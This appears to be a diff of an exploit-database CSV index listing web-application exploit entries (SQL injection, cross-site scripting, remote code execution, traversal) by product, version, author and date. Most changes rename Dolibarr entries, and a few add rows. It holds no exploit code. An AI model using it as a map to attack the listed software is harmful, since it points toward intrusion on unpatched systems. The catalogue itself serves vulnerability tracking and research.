36331,exploits/php/webapps/36331.txt,"Dolibarr ERP/CRM 3.1.0 - '/user/index.php' Multiple SQL Injections",2011-11-23,"High-Tech Bridge SA",webapps,php,
|
||||
36332,exploits/php/webapps/36332.txt,"Dolibarr ERP/CRM 3.1.0 - '/user/info.php?id' SQL Injection",2011-11-23,"High-Tech Bridge SA",webapps,php,
|
||||
36333,exploits/php/webapps/36333.txt,"Dolibarr ERP/CRM 3.1.0 - '/admin/boxes.php?rowid' SQL Injection",2011-11-23,"High-Tech Bridge SA",webapps,php,
|
||||
36338,exploits/php/webapps/36338.txt,"WordPress Plugin ClickDesk Live Support 2.0 - 'cdwidget' Cross-Site Scripting",2011-11-23,Amir,webapps,php,
|
||||
36339,exploits/php/webapps/36339.txt,"WordPress Plugin Featurific For WordPress 1.6.2 - 'snum' Cross-Site Scripting",2011-11-23,Amir,webapps,php,
|
||||
36340,exploits/php/webapps/36340.txt,"WordPress Plugin NewsLetter Meenews 5.1 - 'idnews' Cross-Site Scripting",2011-11-23,Amir,webapps,php,
|
||||
|
@ -35715,7 +35721,7 @@ id,file,description,date,author,type,platform,port
|
|||
36676,exploits/php/webapps/36676.html,"Balero CMS 0.7.2 - Multiple JS/HTML Injection Vulnerabilities",2015-04-08,LiquidWorm,webapps,php,80
|
||||
36677,exploits/php/webapps/36677.txt,"WordPress Plugin Traffic Analyzer 3.4.2 - Blind SQL Injection",2015-04-08,"Dan King",webapps,php,80
|
||||
36678,exploits/jsp/webapps/36678.txt,"Novell ZENworks Configuration Management 11.3.1 - Remote Code Execution",2015-04-08,"Pedro Ribeiro",webapps,jsp,
|
||||
36683,exploits/php/webapps/36683.txt,"Dolibarr CMS 3.x - '/adherents/fiche.php' SQL Injection",2012-02-10,"Benjamin Kunz Mejri",webapps,php,
|
||||
36683,exploits/php/webapps/36683.txt,"Dolibarr ERP/CRM 3.x - '/adherents/fiche.php' SQL Injection",2012-02-10,"Benjamin Kunz Mejri",webapps,php,
|
||||
36684,exploits/java/webapps/36684.txt,"LxCenter Kloxo 6.1.10 - Multiple HTML Injection Vulnerabilities",2012-02-10,anonymous,webapps,java,
|
||||
36685,exploits/php/webapps/36685.txt,"CubeCart 3.0.20 - Multiple Script 'redir' Arbitrary Site Redirects",2012-02-10,"Aung Khant",webapps,php,
|
||||
36686,exploits/php/webapps/36686.txt,"CubeCart 3.0.20 - '/admin/login.php?goto' Arbitrary Site Redirect",2012-02-10,"Aung Khant",webapps,php,
|
||||
|
@ -35831,7 +35837,7 @@ id,file,description,date,author,type,platform,port
|
|||
36865,exploits/hardware/webapps/36865.txt,"Xavi 7968 ADSL Router - '/webconfig/lan/lan_config.html/local_lan_config?host_name_txtbox' Cross-Site Scripting",2012-02-21,Busindre,webapps,hardware,
|
||||
36867,exploits/php/webapps/36867.txt,"CPG Dragonfly CMS 9.3.3.0 - Multiple Multiple Cross-Site Scripting Vulnerabilities",2012-02-21,Ariko-Security,webapps,php,
|
||||
36870,exploits/php/webapps/36870.txt,"ContentLion Alpha 1.3 - 'login.php' Cross-Site Scripting",2012-02-22,"Stefan Schurtz",webapps,php,
|
||||
36873,exploits/php/webapps/36873.txt,"Dolibarr CMS 3.2 Alpha - Multiple Directory Traversal Vulnerabilities",2012-02-22,"Benjamin Kunz Mejri",webapps,php,
|
||||
36873,exploits/php/webapps/36873.txt,"Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities",2012-02-22,"Benjamin Kunz Mejri",webapps,php,
|
||||
36874,exploits/php/webapps/36874.txt,"Chyrp 2.1.1 - 'ajax.php' HTML Injection",2012-02-22,"High-Tech Bridge SA",webapps,php,
|
||||
36875,exploits/php/webapps/36875.txt,"Chyrp 2.1.2 - '/includes/error.php?body' Cross-Site Scripting",2012-02-22,"High-Tech Bridge SA",webapps,php,
|
||||
36876,exploits/php/webapps/36876.txt,"Oxwall 1.1.1 - 'plugin' Cross-Site Scripting",2012-02-22,Ariko-Security,webapps,php,
|
||||
|
@ -39554,7 +39560,7 @@ id,file,description,date,author,type,platform,port
|
|||
44801,exploits/java/webapps/44801.txt,"SearchBlox 8.6.6 - Cross-Site Request Forgery",2018-05-30,"Ahmet Gurel",webapps,java,
|
||||
44803,exploits/macos/webapps/44803.txt,"Yosoro 1.0.4 - Remote Code Execution",2018-05-30,"Carlo Pelliccioni",webapps,macos,
|
||||
44804,exploits/php/webapps/44804.txt,"MachForm < 4.2.3 - SQL Injection / Path Traversal / Upload Bypass",2018-05-30,"Amine Taouirsa",webapps,php,80
|
||||
44805,exploits/php/webapps/44805.txt,"Dolibarr 7.0.0 - SQL Injection",2018-05-30,Sysdream,webapps,php,80
|
||||
44805,exploits/php/webapps/44805.txt,"Dolibarr ERP/CRM 7.0.0 - (Authenticated) SQL Injection",2018-05-30,Sysdream,webapps,php,80
|
||||
44809,exploits/hardware/webapps/44809.txt,"TAC Xenta 511/911 - Directory Traversal",2018-05-31,"Marek Cybul",webapps,hardware,
|
||||
44813,exploits/php/webapps/44813.txt,"New STAR 2.1 - SQL Injection / Cross-Site Scripting",2018-05-31,"Kağan Çapar",webapps,php,
|
||||
44814,exploits/php/webapps/44814.txt,"PHP Dashboards NEW 5.5 - 'email' SQL Injection",2018-05-31,"Kağan Çapar",webapps,php,
|
||||
|
@ -39634,12 +39640,13 @@ id,file,description,date,author,type,platform,port
|
|||
44957,exploits/hardware/webapps/44957.rb,"Geutebruck 5.02024 G-Cam/EFD-2250 - 'simple_loglistjs.cgi' Remote Command Execution (Metasploit)",2018-07-02,RandoriSec,webapps,hardware,80
|
||||
44959,exploits/hardware/webapps/44959.py,"VMware NSX SD-WAN Edge < 3.1.2 - Command Injection",2018-07-02,ParagonSec,webapps,hardware,
|
||||
44960,exploits/php/webapps/44960.html,"DAMICMS 6.0.0 - Cross-Site Request Forgery (Add Admin)",2018-07-02,bay0net,webapps,php,80
|
||||
44964,exploits/php/webapps/44964.txt,"Dolibarr ERP CRM < 7.0.3 - PHP Code Injection",2018-07-02,om3rcitak,webapps,php,80
|
||||
44964,exploits/php/webapps/44964.txt,"Dolibarr ERP/CRM < 7.0.3 - PHP Code Injection",2018-07-02,om3rcitak,webapps,php,80
|
||||
44973,exploits/lua/webapps/44973.py,"ntop-ng < 3.4.180617 - Authentication Bypass",2018-07-03,"Ioannis Profetis",webapps,lua,
|
||||
44975,exploits/java/webapps/44975.py,"ManageEngine Exchange Reporter Plus < Build 5311 - Remote Code Execution",2018-07-04,"Kacper Szurek",webapps,java,
|
||||
44975,exploits/java/webapps/44975.py,"ManageEngine Exchange Reporter Plus < Build 5311 - Remote Code Execution",2018-07-04,"Kacper Szurek",webapps,java,8181
|
||||
44976,exploits/php/webapps/44976.py,"CMS Made Simple 2.2.5 - Remote Code Execution",2018-07-04,"Mustafa Hasan",webapps,php,
|
||||
44977,exploits/php/webapps/44977.txt,"Online Trade - Information Disclosure",2018-07-04,L0RD,webapps,php,
|
||||
44978,exploits/php/webapps/44978.txt,"ShopNx - Arbitrary File Upload",2018-07-04,L0RD,webapps,php,
|
||||
45014,exploits/php/webapps/45014.txt,"WAGO e!DISPLAY 7300T - Multiple Vulnerabilities",2018-07-13,"SEC Consult",webapps,php,80
|
||||
44981,exploits/php/webapps/44981.txt,"SoftExpert Excellence Suite 2.0 - 'cddocument' SQL Injection",2018-07-05,"Seren PORSUK",webapps,php,80
|
||||
44986,exploits/windows/webapps/44986.txt,"Airties AIR5444TT - Cross-Site Scripting",2018-07-06,"Raif Berkay Dincel",webapps,windows,80
|
||||
44988,exploits/php/webapps/44988.txt,"Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting",2018-07-09,"Ahmed Elhady Mohamed",webapps,php,
|
||||
|
@ -39650,3 +39657,6 @@ id,file,description,date,author,type,platform,port
|
|||
45002,exploits/hardware/webapps/45002.py,"D-Link DIR601 2.02 - Credential Disclosure",2018-07-10,"Thomas Zuk",webapps,hardware,
|
||||
45003,exploits/php/webapps/45003.txt,"Instagram-Clone Script 2.0 - Cross-Site Scripting",2018-07-11,L0RD,webapps,php,
|
||||
45007,exploits/multiple/webapps/45007.txt,"Dicoogle PACS 2.5.0 - Directory Traversal",2018-07-11,"Carlos Avila",webapps,multiple,
|
||||
45015,exploits/hardware/webapps/45015.txt,"QNAP Qcenter Virtual Appliance - Multiple Vulnerabilities",2018-07-13,"Core Security",webapps,hardware,443
|
||||
45016,exploits/php/webapps/45016.txt,"Zeta Producer Desktop CMS 14.2.0 - Remote Code Execution / Local File Disclosure",2018-07-13,"SEC Consult",webapps,php,80
|
||||
45022,exploits/hardware/webapps/45022.txt,"Grundig Smart Inter@ctive 3.0 - Cross-Site Request Forgery",2018-07-13,t4rkd3vilz,webapps,hardware,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue